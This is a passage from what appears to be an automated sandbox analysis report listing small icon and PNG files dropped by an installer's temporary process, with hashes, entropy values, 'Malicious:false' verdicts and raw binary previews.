                                                                                                                                                                                                                                                          SSDEEP:12:ON6zzzzzKMSSSSSMa5HVyx7UmImSoH2bnDIjPNNJOtDrc53VrVOt/bQt8wQHz/HC:OD5H4lUbJfUIQ4lQ4j+HPKoCP652q
                                                                                                                                                                                                                                                          MD5:9A89DE631D87C981A0AF3C07FD4AF610
                                                                                                                                                                                                                                                          SHA1:6A5EE66ADA6C57C1FB8B142514DEE3272FF21605
                                                                                                                                                                                                                                                          SHA-256:5E9C12BB009E1DB9568B273B53EBCA3500C3E6D113961729ADF98012FEE299B8
                                                                                                                                                                                                                                                          SHA-512:B3F9BB8803CEAE7E33611BDED0C236C0A14DC6DE730A15910BD80ED15D1CF63BF8A83449E4EB83F593F9FC82C7E4C775AD799A206D3EEC93F8EA99B3746D005F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .................................|~..|..1|..2|..2|..2|..2|..2|..2|..2|..2|~. }.................BI..{..#..."..."..."..."..."..."..."...#... ....AcY[c.Y[c......-...>.. @.. @.. @.. @.. @.. @.. @.. @.. @...?...(..Z]n-Z]n-...-$B..#D..#D.."C..!C.."C..!B.."C.. A..!B..#D..#D...<.._g.M_g.M.../(G..#F.."E..?]..........Ur..<[......]x..$G..#F...A..bl.Obl.O.../(I.."G..,O..............................2T.."G...C..bm.Obm.O.../(K.. H..Qn..........Kh..............<^..#J..#J...E..bn.Obn.O.../(M...I..g.......k....G..$L..........3Z.."K..#L...G..bn.Obn.O.../'P...L..`~......g....L...L..........Qv...M.."O...J..bo.Obo.O.../'R.. P..Bh..........!Q...N..^}......Z}...O.."Q...L..bp.Obp.O.../'T.."T..%T..........r...*[..-[..Ot..h...9g..!S...N..bq.Obq.O.../'V.."V.. U..@i..........................6f..!U...P..bq.Obq.O...-'Y.."Y.."Y.. W..=h..................\...!X.."Y...S..br.Lbr.L...."P..!].."\.."\.. [..!Y..-a..3e..(_.. Z.."\.."]...M..^g~(^g~(....+N.B,_..)^..)^..)^..)_..(^..(^..)^..)^
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):830
                                                                                                                                                                                                                                                          Entropy (8bit):7.743747035981289
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7MppO0bioeoVRws0LZivpCt1BIwB2QG9Qs1Vzaok9cz7A1oLVDiDkaBx9q8rS:hg0OX6wVduQywAQG9vSkEQiDY5aA7
                                                                                                                                                                                                                                                          MD5:EB5BFEE784207B0EED0CB53FB3CF7509
                                                                                                                                                                                                                                                          SHA1:519EEA88024FE4ABBA292A5097D879D42EEFC813
                                                                                                                                                                                                                                                          SHA-256:450B1779BBDB391E340B1A142C0F2AB89836F6E7BDEAA864F9D660059129F13E
                                                                                                                                                                                                                                                          SHA-512:0404FF8FFCDB1F8A1935837883102FF113EC3E18E550544F7B33D8554D8DFE4EEAF3590A88E9C62A02AFCCDA0946E17BDF2700FD85CF84E912CDDDF09CB883E9
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx.u.iHTQ......q2...f"K3...2.6[....5d......J..PadHE.m..mS9QD.E..Q.eaD..c.Fn.::.{...YM....{~...._.?..".Yqo...i&9,..W.ie..2....,x=.J.mR....sV...=w.\.....5.0'r...p...A.<.u.....j..~:...u..w...~Sf..Xc..a9../..<.1.....ks....9.7..Uf.D0....H......B...IR6.\$s..%.2.|:.)!..[..0.....o......f.6....'Ud.(..x.#.c...v8..'......]....0.".T.Zn.>..}_......@...QP{.B....G..";&...&v}<.bj.....6a.m.f<.E......[....b.1./.....H.M9..Z........%q......bs......|..%.z.wcp.Y.$.I......oJ.m......[s.'[...:..N[....|.r...$.b......L7.B..M.n...jx.q!.2.!...I.^.!...6..>*.9.=..~Y.....L.dd..F~.8Pw..J-.mY.(~.c......7..W.f'.n.q1.D}..J...1....Re..t.,........A.g.Gy..x...|.+c..+.2......f.....{.ui=.....@U...;...U.........Jz....o"...e...J.x.im..{...!.......O@s.O....0X.7f'K.g8......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):5.568471936906983
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:EsvbDZdGE4mTfyxt6fSgSgd7+WmhOXYvTTT5:jH8mm6KXkSW1OTTT5
                                                                                                                                                                                                                                                          MD5:60EEE3F506D7E7F1A87845F441D2FB09
                                                                                                                                                                                                                                                          SHA1:E3D9A990606A52FB057237EB1F1435605CDDF360
                                                                                                                                                                                                                                                          SHA-256:E4C99A376C5625C022A1CEE0422382E58516350B5602779286131579DDBFD108
                                                                                                                                                                                                                                                          SHA-512:54CE729C0033D0E3C5ABF33D0F67BC5E9032A4374CC274E978F1129AE44276D6AE58B83DCE6CCFE72CA3681B3F3BEB6FDB0928843D6246180AACF50A2BDED936
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .............................................KKK)...i...........iKKK)................................\\\/..............................\\\/....................|||J........................................~~~I............\\\/................Z....s..w.......................\\\/........................r..Z...._..~...\..........................QQQ).................r..Z...._..............................QQQ)...i........Z....U...{..Z....g..{..............................i............n...y.......q..........n...g...g...y..............................p...p...x.....................}...............i.........6...6...6...6......p.}........\.}.............hQQQ)..........................g.}.....................QQQ).........................h......h.}.............................^^^..................6......y.}..................eee+...............H.......................................H....................^^^..........................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1001
                                                                                                                                                                                                                                                          Entropy (8bit):7.758725240902144
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:PLiyUaMQzTd2JxkVLDF0b5YPQfmCmGnX49:DFKmR6kVne5YPxCmEa
                                                                                                                                                                                                                                                          MD5:5B29258244BCAD93923044B9CA6349A1
                                                                                                                                                                                                                                                          SHA1:CC6CC6ABE4420DFA97552F5A1FF0DACA652AACE6
                                                                                                                                                                                                                                                          SHA-256:A7D4C1C8C6FCEC92068D60D0DEFBAA38EA75010D01EA753FC913749CC89E8FDF
                                                                                                                                                                                                                                                          SHA-512:AA8345E54E397D1AECE33F8CBE66B12AAB5F373109C787DE7C8C23BB0949A2B184CC1FB2E08CFA66F7374ABFD26EAA21D85857C74B67AEE31590A197971AF15C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx.MS{L[u.=.{o.K{)miy..<G......sF.#..d..;F.#S.-:53.ht31n..BLD.0..9E.3,u.s!.2....W_./.....k.h8._.9...|.s.7(..!..D..&.g..m.9..D.......-..r..#....!.N.V.+U..tu#".!K2..........db|"}.?.[s\>....x.....1....T.......z....;......lgv.4.\...|~,...{....Mk........s...&To..y...H..........l.}m.h).....l.`k...@.O.....6$.N8[...k\"...m.'8....o....i..<......X.HM..Z.H..4R&.*.P.:k.7..?.zH.....9v.u.`..E..|Dy...UP3Z.5)..).~5.."..H....v...>..H.......f!u.iEF@.M..k..]......NM".1.K.....,....0(}Dl.%...D.D@"...hp^.C[.g.c@$..w_.K...B.&u`|..|..66.>@(...r.......`t......#....i...J..,.....T....oN.V...%.......H.n.v.%...i/.4D..)....w<".=...+ +.......Xw."....|...s.%..#/g5...8..@...l...........[.E&.`%...w......t.U....w99Z...A...F.v.:(M.O<..W..{x!.z4.*.)p.<.G..Z.X..A...tu........*n.n...9.hy..>...~o....i....1.....O...ZK......&.f=...*SW../`\M.......".Yds.R..:.CY...~+srI.@...E.?f...W...aI..,\Xyy.........u..G...{...D.P.....X-...k.b..D.Y^.........1....IEND.B`
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):3.8378245167837792
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:ttl7t4rfiKKc1XgZUZUZUZUZUZUJXm5ZUZUZUZUZUZUZUZUzC25ZUZUZUyUZUZUg:vlJcP+mpC2KC2KC2KC2KC2Kno9gH9Pcn
                                                                                                                                                                                                                                                          MD5:9647EA4E877FE5A0A08E611D46767EBD
                                                                                                                                                                                                                                                          SHA1:B64CB43619FF5F96F26C0FEFD03CB96373E1E0D9
                                                                                                                                                                                                                                                          SHA-256:DB32B69F2877535C81DFD48ACCA5251BCEED320C1E8A03135F8C80C11D6F248A
                                                                                                                                                                                                                                                          SHA-512:ED6CDB303CBEF7378C1EE1EBF22F9EACF59D354F3157766E486F2A8CEB5E30F11B11F0D289B254F83197F07208C7DF3A14E9EBA3680E38D6CCE6D4AD791F3DCE
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ..............................................{ .{..{..{..{..{..{ .................................{ .{..{..{..{..{..{..{..{ ............................i:7.i:7.i:7.i:7.i:7.i:7.._Y..{..zr..YP..YP......SK.SK..SK..SK..SK..SK..SK..SK..SK..QJ.i:7..{..{..YP..YP..YP..SK..SK..SK..SK..SK..SK..SK..SK..SK..SK.i:7..{..{..YP..YP..YP..SK..SK..SK..SK..SK......SK..SK..SK..SK.i:7..{..{..YP..YP..YP..SK..SK..SK..SK..SK......SK..SK..SK..SK.i:7..{..{..YP..YP..YP..SK..SK..SK..SK..SK......SK..SK..SK..SK.i:7..{..{..YP..YP..YP..SK..SK..SK..SK..SK......SK..SK..SK..SK.i:7..{..{..YP..YP..YP..SK..SK..SK..SK..SK......SK..SK..SK..SK.i:7..{..x..YP..YP..YP.SK..SK..SK......................SK..SK.i:7..{..................SK..SK..SK..SK..SK..SK..SK..SK..SK..SK.q?;..{..YP..YP..YP..YP..SK.SK..SK..SK..SK..SK..SK..SK..SK..VN..{..{..YP..YP..YP..YP..........................{..{..{..{..{..{..^U..YP..YP..YP..........................{..{..{..{..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):3.5511716867819327
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:BifyRHHHHHHHHHHHlKDAYHQhY4O4ZYwg7iTT5:wfyHHHHHHHHHHHgDAMQhY4O4ZYwg7iT1
                                                                                                                                                                                                                                                          MD5:F311592151DC7F196CDBC8AF6D426B28
                                                                                                                                                                                                                                                          SHA1:159C11940E4F380F62D56AD12745600EDBEF1E15
                                                                                                                                                                                                                                                          SHA-256:03290429CE68AFD7507C177C9446EFBCC47CFD040DECA70105988D0057919317
                                                                                                                                                                                                                                                          SHA-512:A3259406480C89E73B408DBFDA00B8CBE5F2B168A1C46F6FE73A228B167CDC532FFBB315BD027B130634B8A248F488BD2ADA22CA5A45DF2AD3E728D3FA5DA832
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ..................................l.(.l...l...m.?.m.`.m.|.k.y.k.].o...............................r.A.q...q...q...q...q...q...q...q...q...o.7.....................u...u...u...u...u...u...u...u...u...u...u...u.o.............y.a.z...z...z...z...z...z...z...z...z...z...z...z...z.^.........~...~...~...~...~...~...~...~...~...~...~...~...~...~.........|..........m.......................3........................|..............x.......9.......'.............................................................................8...................................8.............................................................................'.......9.......x.......................................8.......................m................H...........................................................G..........................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):4.984582163595734
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:ltjzPCZMaBUC2R0pwXqeCvJX/JutpSu39Gl/GofW9y88rk:ltj05gBXqeCJ/8pSx/Gp9y88w
                                                                                                                                                                                                                                                          MD5:4EAA9A0B583BB8C8A369753DBD0DD0EB
                                                                                                                                                                                                                                                          SHA1:2D8F80DF55ADB806651E9B90C32C287825EFA9B6
                                                                                                                                                                                                                                                          SHA-256:EABEFD31E31D5141F75E760FCF96F14844F0824BD20C3FAD28C6E7C6AF4342FB
                                                                                                                                                                                                                                                          SHA-512:B4B5CE8697B0B195F5DFF361B7822207CBC8BB07A3318154A4652A663F9715958770B55ED9D8B0F5EE37AC5BCDD19C4D2389E7D644187B86762565ED27613D8D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ..........................................................................................................................t4..z9..z9..z9..t5.....................!.9.&.=.!.9.!.9..v4..q3..z9..H..E...D..z9..q3..q3........OG.X.=.O.-.C.`.v.`.v..x8..W..z9...M.f...5...+...%...+.../...?...I.[.\.s.8.O.[.o.[.o...D.....G...J...X...a...X...O...K...V...U...=...`.t.?.d.S...J...S...a...o...a...J...E.....y..d...B.....J...O...Q...Z...f...s...i...W...N........j............K...../...J...X...[...X...L...b....z.................z..Pi........R.eHc.w.m..s...........V....................U..U.............R.eoQ.d.O.b.M.`.L.^.g.Zl.W..W..W..W..W..W.....................:.JW9.J.9.I.9.I`.....q3$.z<.r3..{=.t5$........................:.K.......9.I......{=..|......X..|>.........................;.K......:.J......s4.........|..v6.........................;.LE;.L.:.K.:.KN......@........t...A..............................................~?!..E..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):3.614804652904851
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:Biiii8ibi0TiSDiiuYxId1diiiiSiiiwKrkIzpJi4arAJbJbJbJbJDg:Biiii8ibiaiSDiiTxIfdiiiiSiiiwKr2
                                                                                                                                                                                                                                                          MD5:92E919F7716BFEC2191169F9D1513737
                                                                                                                                                                                                                                                          SHA1:E7BEB2821E116084C0A516D754A0C7A534956BD6
                                                                                                                                                                                                                                                          SHA-256:C5CB556AFCF8E5F48AA604646FFE93AEDE2607342C4AA93D70791ED8C4FFFE4B
                                                                                                                                                                                                                                                          SHA-512:574F731D0220B353AEAC4B442E6ADED51CE54A7BE93BF3EFC3A7EB8F15161FAA3A1806C859C585ACCC351195AA0376608A5ED5B126DD552296D2305367008014
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .............................................|||.|||.|||.|||.|||.|||.............................|||.|||.|||.........................|||.|||.|||.................|||.....|||.......=...$..Y...Q......|||.....|||.........|||.|||.|||.....|||.......T...7..n ..`%.....|||.....|||.|||.|||.|||.............|||...../.n...J...(..g'.....|||.............|||.|||.....|||.....|||..........a...,..u(.....|||.....|||.....|||.|||.............|||.....{....Z...3..z*.....|||.............|||.|||.|||.|||.|||.|||.........................|||.|||.|||.|||.|||.................|||.....'.U...A..t3..o:.....|||.................................|||.......Y...7..q...\".....|||.................................|||.....{....\...-..r&.....|||.................................|||.....o.~...^.-.C.=.>.....|||.................................|||.........................|||.....................................|||.....|||.}}}.|||.|||.........................................|||.....|||...........
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):4.518492008840673
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:XTZmE/ZYQwseqlUQQSbG1tHhRNyYkTHHSD:XTgEGiSnZiL8
                                                                                                                                                                                                                                                          MD5:6F6B30B331D4B1B52218C3EE9F6008E5
                                                                                                                                                                                                                                                          SHA1:99BB8C47F45B605BA74866586F9B2AC64CAE082A
                                                                                                                                                                                                                                                          SHA-256:E5995C8370B5C383F7B3A60F3A79D3A67650A85C3A954D208E4736F4021BE24E
                                                                                                                                                                                                                                                          SHA-512:1BA21D5611D96D7090F3A9E80E1DBBE34C390E02AA7145354F069253B0D440D488D24F385CC2A0A9469A9D5D9EFED10D4D1F15A8D36969497593A2B60903B885
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ...........................................................................................................v.........@...@...........................................p...Xy..........................p...................0...........X{..Y|..Z~..[...\.....................0.................Wy..Xz..Y|..Z}..[...\...........i...`.................P.....Wx..Wz..Y{..Z}..Z~..z...................`...j.........0.........Wy..X{..Y|..Z~..........................`...`.........p.......Xz..Y|..Z}..............q..........._..._..._.................Y{..Y}..y...........]...]...^...r......._..._...................Y|..Z~..............\...]...............^...^...................Z}..y...............\...................]...]...................Z}................[...................]...\.........`...0.....d...Y}..........Z~..z...............[...\...p......... .............d...Y|..Z}..Z}..d...y...Z}..Z}..Z}..e.......................................n...Y|..Y|.......
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):5.472732468708232
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:eO+ZmtXn7q6EQAkkUNtYa1TBExcA8CNJF22222yLIXTN:eO+4p7q/QAtqTexR8M22222sIXZ
                                                                                                                                                                                                                                                          MD5:F81E507FDAD67F58488CF3D937594180
                                                                                                                                                                                                                                                          SHA1:59C646FB4F2808E0020BDF1728237F067B3264D2
                                                                                                                                                                                                                                                          SHA-256:DCA19404AB1499715ED30AFCA88E4BD85371BADC6A51E1677EAEB1DFFC8CA289
                                                                                                                                                                                                                                                          SHA-512:70FAB93C992E18FE77C53C2DAC203B2F599DCD888D55015E668B2DB149AE51BCA7DF6A772D5FB4633D038BFEB6CFBF4CF64C3384031E7DE4BC23BA6948171357
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .....@...............................................oL..pM...............................................n.3.y...|..~...~...|..y...n.5.............................y...................................y..1!...................|...........................................}...............z.;..................1..|..........0..............{.?......................$.....h.........p...................a...............\................................g.....+.......D.........................................../.../.......U.............................3............3.}...".."..".."..8.....................].....!.."..........%..&..&..&..&..&..&..W.............$..&..%..........'W.)..)..)..)..)..)..)..)..2..A..)..)..'[.............+..,..,..,..,..,..,..,..,..,..,..+..................*...../../../../../../../../.....*.......................%../e.0..1..1..1..1..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):524
                                                                                                                                                                                                                                                          Entropy (8bit):7.51499904676362
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/725PQZeziVpf6wu0rWQ6Rfcho1S01oS77Qtytds:zJQYgB6wnrWQ6ih0WSQtyns
                                                                                                                                                                                                                                                          MD5:6A3D971DD10943973AD7CFF8776678EE
                                                                                                                                                                                                                                                          SHA1:1FC9EA38435DBA93A64B9E48C7A3CCDED3D92333
                                                                                                                                                                                                                                                          SHA-256:EDB59D1E30DEACB83DCCB9CA2D7F83FC52066CAFC7A8E0A633B9B0DD01CDA360
                                                                                                                                                                                                                                                          SHA-512:B5C8C60578504EDD4EDDF7C5A9CC17BA3D04773CA200D5A8189D22C06BAA9081382F6D3FE076771F385AF7DAC51196AC4BFEFF1852A5E16BBF9AE6D1599FFE0E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx..OHTQ...w.p.".DP........$Z$.ZD......FB.A`.`.%r.b.....E.T.....I.h!R..B(*2....o.hP3..y....q.w.u....xH.S^..}'.B......q..nY1K\Q....qW.......D.se......67......,...r.8.[......L..-....n...[....3..K.....N.q.q.f.n.$....k`..DGaf....Z3..<0...u..w%.A.^...Y....p.-.U.t...p...s.E).....:.[T.a.&(..'S......B..B.%u...T=....w..{....{..T........t..^...U.u....pbm.l...G....8.8c..EgT............R..G.w..-t...,......a.....]......t...]2.!....=..7...W.......X.......7.#.....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):5.54214238379203
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:6eIPdVt3Mxoi5U7YoFhqG0f9tX9vWHpWcd9JU:6NCSFhqlvWHpWcd96
                                                                                                                                                                                                                                                          MD5:A7F6DC763A6C440673C6A65E1174379F
                                                                                                                                                                                                                                                          SHA1:E3FE4B3EA5D58231C0326BD5BA9BC1A15D6C095D
                                                                                                                                                                                                                                                          SHA-256:442AEC90EE87A5859CB87703F0ADA203796A24A36F8FA7AAA5C80E87995F1E65
                                                                                                                                                                                                                                                          SHA-512:6A06B633363C13F056B8A23CEB3D507427F26DEC1844A043D49B99BB7F95C18BA21A1F08457E7A714F17A6D1A04ECC6DCEDB855D439E5D881F6D3CFB3C7517CB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .............................9z.q6t..0q../v..'f..3g......-Y.i.X..7w..:{..6w..9{.z............,~..G...!.......D............E.......,...)...0................r.>1...M...............................6...6....v.'................7.......................................5.................#...#SM......./G..2I..........................Vw.. ..\........1"&...#.^hw.....,A..@Q..........................&...$...$.......A22.-.#.C?F......-...-..4O..Mf..~...............&...%...8/......C44K<./.=:n..+...6..'E...=..%I..3S...?...2..%;..).(.0$&.?43K......../+`..)......%0..@O...'...,...*...-...$...5..-2..('g.).!..........$.0!2......................................$0...)................y...[.*.".........Z...(...............$."...A.....................+ #.,.".+.".....................&.".%.".5.-."...................-"%.6&(.2#$...........o.........!...%.".,''.....................-#$)P;:.Q96.....................&.!.%.!." .5........................I97`fMJ.J53.0#%.*.".(.!.'.!.&
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):763
                                                                                                                                                                                                                                                          Entropy (8bit):7.6950381846314215
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/71dxGeeaA/as1IpxNhX3HqPPwVS2TgW41SeJq5RXB4f4a:oqeeaAT1IpxNhKXNW5VBO4a
                                                                                                                                                                                                                                                          MD5:F38AF891CBBDCD155644E65363A01520
                                                                                                                                                                                                                                                          SHA1:BA161945A3E87EA2B3735165854E8AEF28B4F201
                                                                                                                                                                                                                                                          SHA-256:DEF30878F80E5B00CE9F334170DD6369127C52E03959F5673B7193D8B21EE80D
                                                                                                                                                                                                                                                          SHA-512:AFB7BD4EECEF8B2E9E082E3A7203DC393E92683B4AD2B301072A4BC8C22D710AF740BC553EE92997C714FD80F993A3BE0257EC09FF46C75AEEC3EB615553613C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx..iHTQ...o..of..mT,M.@..Q).R"A.......Yb~0+..,../.}.>....X...J..DV..6.3..t.w{c$A.A....=.w.{....j'.....4-.K$T...W.w$...3m.H........ZT._.t6$..4.....\Z.....#.Z.....V.Og.....Z.oxm._..F..:.;,..0..1.Y.i..^....;qs..}..F..m.6]...*..JH..W.1.......D.....Rn..!O..T,%..z.........{(........,._.....&....#...........9">..#N..?....l.D.dO..&.....4....0..V}$b"u...ly..0....].F....S........b.....U......P.....@&.B....0.A.\~}A....I!..Eg..0.Z...M^........O.2.Z_.4.Jpv..6C...D.td.....94Db..E..7..,.J...J-..2..,..8T....p.#C.k..SU.y..g[..~a^.q.=.C6k....w.IT+4../...eY..p.P*..En.....rY..*. *"j.... .^..l......:.p}PS6P.....*...o...fdD..8.S.&..(Z...A...uqD...f.Y.i2.{?s...}.fMNK..u.].z*3.....'....K.R....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):865
                                                                                                                                                                                                                                                          Entropy (8bit):7.700995430791155
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:gYFXmor3S32jSx6mJYuknx/vNdapyefgQP71YZbHYG:bXm3SwV12x/vPapyCf710bHYG
                                                                                                                                                                                                                                                          MD5:781F31C7BDF09937698ABFE875672A7B
                                                                                                                                                                                                                                                          SHA1:9ED7E05BAB393E6D09DF2C6B8970805F088586B4
                                                                                                                                                                                                                                                          SHA-256:A48944491AD937CA359AE2F8C57070CF69DC58B6F363F8E66B8C2EBE9F8DFB9A
                                                                                                                                                                                                                                                          SHA-512:B7810E56C63EDB096670841C28A70DF441F82741D16439D2CDA39AA3BBB65711379383FE089887DCA8005168F0B7C5B351CF8552DCD6DD4C4FC47D10D9261690
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a...(IDATx..ilLQ...}....m*..%..........!.A.5>..H?...^..PK..,.KJ|..B,...Z.h......3..w.u..WN&..{....Y......D.x`..l..a...!D2.(..I..z.z......@).(.K. .K.m..)R'>H..R..7.mX.....XZY...b\...'....-[.p@x.......#.o........G..).4.Pm.p..I......w..fL..d<..t.9.PR.P....fK...4...3.... ..$v.I..hk79...DL..5...(..@..i..p}f/....6..U.c!iq.......9..Q ...(....H.4r..y>.....(X.....Q...b).'....b..a.c.'..E{..L...q.>~L.6....k.a....0.kM0'.......Z.Q..."Z..KA..{..A#:.7.6(..|...U..`e.......l\>...../:xYu....*.....rWW..jA..#..O..!#..ia.8...c...Y..!........eSR..%wtBCF...>kb........f..:.0......M\.m.o..".Qco...E...?|:i.....U._..L.."Q....q.`ILU...)\80=.X..fJ8..M...(..p.6......'...x......*8F......8...R.O.O.RZ(...F.wK@..S.....?k...\a..._>4.<...e#'l .7.53.....Y..jk..8.....3.dK..1.....B..p.9.....*.-.-F.[...2C.n.~../V...$iB....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):3.5511716867819327
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:BifyRHHHHHHHHHHHlKDAYHQhY4O4ZYwg7iTT5:wfyHHHHHHHHHHHgDAMQhY4O4ZYwg7iT1
